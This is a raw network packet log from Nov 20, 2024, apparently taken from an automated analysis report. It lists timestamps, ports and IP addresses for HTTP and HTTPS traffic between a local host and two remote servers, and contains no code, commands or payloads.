Nov 20, 2024 16:57:27.953269005 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.954144955 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.954195976 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.954581022 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.954633951 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.955394983 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.955446005 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.956911087 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.956923962 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.956937075 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.956984043 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.956984043 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.958458900 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.958515882 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.959212065 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.959259987 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.959307909 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.959357023 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.959496975 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.959538937 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.960763931 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.960808992 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.961218119 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.961257935 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.961339951 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.961352110 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.961380005 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.961406946 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.962477922 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.962491989 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.962527990 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.963085890 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.963098049 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.963109016 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.963120937 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.963135004 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.963176966 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.963176966 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.963588953 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.963633060 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.963742018 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.963783979 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:27.965702057 CET  80     49166  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:27.965749025 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:30.275741100 CET  49166  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:35.518501997 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:35.638484955 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:35.642501116 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:35.642501116 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:35.765492916 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883152962 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883167982 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883188963 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883199930 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883213997 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883220911 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:36.883233070 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883243084 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:36.883246899 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883250952 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:36.883260012 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883265018 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:36.883275032 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.883276939 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:36.883292913 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:36.883306980 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:36.884166002 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:36.884206057 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.004192114 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.004209995 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.004257917 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.007613897 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.007750034 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.007787943 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.007787943 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.016068935 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.016508102 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.105851889 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.106204987 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.109006882 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.109174967 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.109625101 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.109659910 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.109791040 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.109921932 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.114381075 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.114429951 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.114448071 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.114545107 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.122898102 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.123275995 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.123326063 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.123326063 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.134284973 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.134674072 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.134721994 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.134721994 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.142606974 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.142996073 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.143039942 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.143039942 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.151093960 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.151453018 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.151613951 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.151788950 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.158328056 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.158487082 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.158898115 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.158981085 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.165581942 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.165684938 CET  80     49167  192.3.220.29  192.168.2.22
Nov 20, 2024 16:57:37.165719986 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.165719986 CET  49167  80     192.168.2.22  192.3.220.29
Nov 20, 2024 16:57:37.172907114 CET  80     49167  192.3.220.29  192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.172976017 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.173201084 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.173263073 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.179951906 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.179975033 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.180131912 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.187426090 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.187479019 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.187707901 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.187752008 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.312028885 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.312453032 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.312505960 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.312505960 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.314694881 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.314738989 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.314795971 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.315078974 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.319900036 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.319966078 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.320008039 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.320219040 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.325046062 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.325354099 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.325453043 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.325871944 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.330269098 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.330321074 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.330482960 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.330933094 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.340572119 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.340617895 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.340831995 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.341061115 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.344275951 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.344332933 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.344540119 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.344988108 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.349497080 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.349559069 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.349890947 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.350033998 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.354532003 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.354585886 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.354784966 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.355437994 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.359725952 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.359855890 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.359884977 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.359884977 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.364882946 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.364937067 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.365012884 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.365314960 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.370151043 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.370163918 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.370198965 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.371957064 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.372211933 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.372252941 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.372252941 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.377309084 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.377479076 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.377723932 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.377774000 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.386409998 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.386425972 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.386471033 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.386471033 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.390984058 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.391052961 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.391226053 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.391268969 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.396344900 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.396418095 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.396478891 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.396564960 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.522515059 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.522624016 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.522712946 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.522753954 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.524490118 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.524533987 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.526230097 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.526282072 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.527007103 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.527051926 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.533364058 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.533412933 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.533704996 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.533880949 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.537605047 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.537650108 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.537776947 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.538177967 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.541805983 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.541948080 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.542102098 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.542280912 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.546164036 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.546225071 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.546478987 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.547128916 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.550438881 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.550600052 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.550740957 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.550775051 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.552246094 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.552258968 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.553936958 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.555488110 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.555527925 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.555547953 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.555684090 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.559673071 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.559775114 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.560075045 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.560123920 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.563951015 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.563997030 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.564526081 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.564560890 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.568209887 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.568631887 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.568917036 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.568977118 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.572516918 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.572565079 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.573154926 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.573199987 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.576908112 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.576950073 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.577124119 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.577231884 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.581161976 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.581248999 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.581299067 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.581299067 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.585485935 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.585530043 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.585562944 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.585604906 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.589740038 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.589795113 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.590254068 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.590534925 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.594185114 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.594705105 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.594749928 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.594749928 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.598275900 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.598350048 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.598429918 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.598504066 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.602582932 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.603446007 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:37.603507042 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.603507042 CET4916780192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:37.607078075 CET8049167192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.347465038 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.347474098 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.353996992 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.354079962 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.354093075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.467509985 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.467587948 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.467602968 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470644951 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470653057 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470681906 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470696926 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.470705986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.470746040 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.475193024 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.475200891 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.475236893 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.478770971 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.478777885 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.478822947 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.478828907 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.482271910 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.482319117 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.482319117 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.482342005 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.482405901 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.486835957 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.486843109 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.486900091 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.486906052 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.490711927 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.490783930 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.490789890 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.495084047 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.495134115 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.495140076 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.499166012 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.499219894 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.499226093 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.501888037 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.501939058 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.501945972 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.505932093 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.505985022 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.505990982 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.509107113 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.509165049 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.509171009 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.513525963 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.513581991 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.513586998 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.516937971 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.516993999 CET49168443192.168.2.22142.215.209.78
